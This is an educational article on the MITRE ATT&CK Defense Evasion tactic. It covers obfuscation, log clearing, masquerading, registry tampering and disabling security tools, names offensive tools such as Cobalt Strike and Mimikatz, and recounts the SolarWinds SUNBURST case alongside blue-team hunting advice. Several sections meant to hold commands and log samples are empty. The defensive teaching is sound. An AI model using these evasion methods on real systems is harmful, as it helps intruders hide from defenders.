Defense Evasion (TA0005)

The Attacker's Critical Art of Stealth & How to Stop It

Introduction: The "So What?" Hook

Defense Evasion is the attacker's systematic effort to avoid detection by security tools and personnel after breaching a network. It's not just about getting in, it's about staying in, unseen, for as long as possible.

Why does this matter? In the cyber kill chain, successful Defense Evasion is what transforms a brief, noisy intrusion into a persistent, devastating breach. If an attacker can't evade, they get caught quickly. But if they master this tactic, they can move laterally, steal data for months, and embed deeply into your infrastructure. For defenders, failure at this stage means playing a futile game of whack-a-mole while the real threat operates with impunity right under your nose.

The Core Analogy: The Digital Chameleon

Vocabulary Decoder Ring

• Obfuscation: The art of making code or data difficult to understand or analyze. Why it matters here: Attackers obfuscate malicious scripts to bypass signature-based antivirus and hide their intent from analysts.


• Indicator Removal: Deleting or altering evidence of compromise from logs, filesystems, or memory. Why it matters here: This is the "cleaning up" phase of Defense Evasion, making forensic investigation and incident response exponentially harder.


• Living Off the Land (LOLBins): Using legitimate, pre-installed system tools (like PowerShell, Windows Management Instrumentation) for malicious purposes. Why it matters here: These tools are trusted by the system and often poorly monitored, providing perfect camouflage for malicious activity.


• Rootkit: Malware designed to hide the existence of other programs or processes, often operating at the kernel level. Why it matters here: The ultimate form of Defense Evasion, making malicious processes invisible even to the operating system itself.


• Signature-based Detection: Security tools that identify threats by matching patterns (signatures) against known malicious code. Why it matters here: Much of Defense Evasion is specifically designed to break these signatures through packing, encoding, or polymorphism.

The Attacker's Playbook (Red Team View)

The Chameleon's Mindset

From the attacker's chair, Defense Evasion is a continuous, adaptive process. Every action is weighed against its "noise" level. The goal isn't just to achieve an objective, but to do so while generating the minimum possible security alerting. It's a game of psychology, understanding what the blue team monitors, what they ignore, and how they investigate.

Common Defense Evasion Techniques

• T1027 - Obfuscated Files or Information: Encoding, packing, or encrypting payloads to avoid signature detection.
• T1070 - Indicator Removal: Clearing Windows event logs, deleting files, or tampering with prefetch files to erase tracks.
• T1036 - Masquerading: Giving malicious files names and metadata of legitimate system files (e.g., naming malware "svchost.exe" but placing it in a user directory).
• T1112 - Modify Registry: Altering registry keys to disable security features, persist malware, or hide configurations.
• T1562 - Impair Defenses: Directly disabling security software like antivirus, EDR agents, or logging services.

The Evader's Toolbox

Cobalt Strike (for malleable C2 profiles that mimic normal traffic), Mimikatz (with techniques to bypass AMSI and execute in memory), Living-off-the-land binaries like PowerShell, BITSAdmin, and certutil (built-in tools that fly under the radar).

Command-Line Glimpse: The Attacker's Terminal

The Defender's Handbook (Blue Team View)

The Museum Security Director's Mindset

Your job is to notice when something doesn't fit the pattern. The "guard" walking slightly off-route. The "maintenance" happening at 3 AM. The camera that briefly flickered. In digital terms, you're looking for anomalies, not just signatures. You must assume the attacker is already inside and trying to hide. Your security tools are your sensors, but they can be tricked, you need to look for the signs of the trick itself.

SOC Reality Check: What You Actually See

Here are real log entries that scream Defense Evasion:

Why this is suspicious: Legitimate PowerShell use rarely needs execution policy bypass with long encoded commands. A "service account" clearing audit logs is highly unusual. Together, they paint a clear picture of evasion.

Threat Hunter's Eye: Proactive Hypothesis

Hunt Hypothesis: "Look for processes that spawn from unexpected locations (like user temp folders) but are named after legitimate system executables (svchost.exe, lsass.exe, csrss.exe). This is T1036 Masquerading. Correlate with network connections to newly seen or known-bad IPs."

Defensive Tools & Categories

• Endpoint Detection & Response (EDR): CrowdStrike, Microsoft Defender for Endpoint, SentinelOne. These look at behavior, not just signatures.
• Security Information & Event Management (SIEM): Splunk, Azure Sentinel, QRadar. For correlating logs across systems to spot evasion patterns.
• Process Monitoring & Application Control: Tools that baseline normal behavior and alert on deviations, like Sysmon with a strong configuration.

Blue Team Command: Your Investigative Lens

Real-World Example: From Headlines to Logs

The SolarWinds SUNBURST Attack

The 2020 SolarWinds compromise was a masterclass in sophisticated Defense Evasion. The threat group (known as NOBELIUM or APT29) didn't just breach SolarWinds, they engineered their malware to be nearly invisible for months.

Explicit Connection: In the SolarWinds attack, the threat group used Defense Evasion when they designed the SUNBURST backdoor to remain dormant for up to two weeks, carefully checking for security tools, virtualization environments, and analysis processes before activating. This allowed them to bypass automated sandbox analysis and avoid triggering behavioral alerts, giving them time to move laterally to high-value targets like government agencies and Fortune 500 companies.

The malware used legitimate SolarWinds digital certificates for signing (making it appear trusted), communicated via normal HTTPS to blend with web traffic, and its command-and-control domain names were crafted to mimic legitimate SolarWinds subdomains. This multi-layered evasion made detection exceptionally difficult until manual threat hunters noticed anomalous network traffic patterns months later.

Mapping the MITRE ATT&CK Defense Evasion Landscape

Below are some of the most prevalent Defense Evasion techniques. Remember, each technique has numerous sub-techniques, these are the high-level categories that form the attacker's evasion playbook.

Key Takeaways & Immediate Actions

Further Learning & References

Dive deeper into Defense Evasion with these essential resources:

• The Official MITRE ATT&CK Defense Evasion Page - The definitive source for all techniques and sub-techniques. Bookmark this.


• CISA Advisory on Top MITRE ATT&CK Techniques - Real-world data on which evasion techniques are most used by nation-state actors.


• SwiftOnSecurity Sysmon Configuration - A legendary, well-documented Sysmon configuration that catches numerous evasion techniques by default.


• "MITRE ATT&CK: Defense Evasion" by SpecterOps - An excellent technical deep-dive from experienced practitioners.


• Internal Learning Path: After understanding Defense Evasion, attackers typically move to Credential Access or Lateral Movement to expand their control. Study these interconnected tactics next.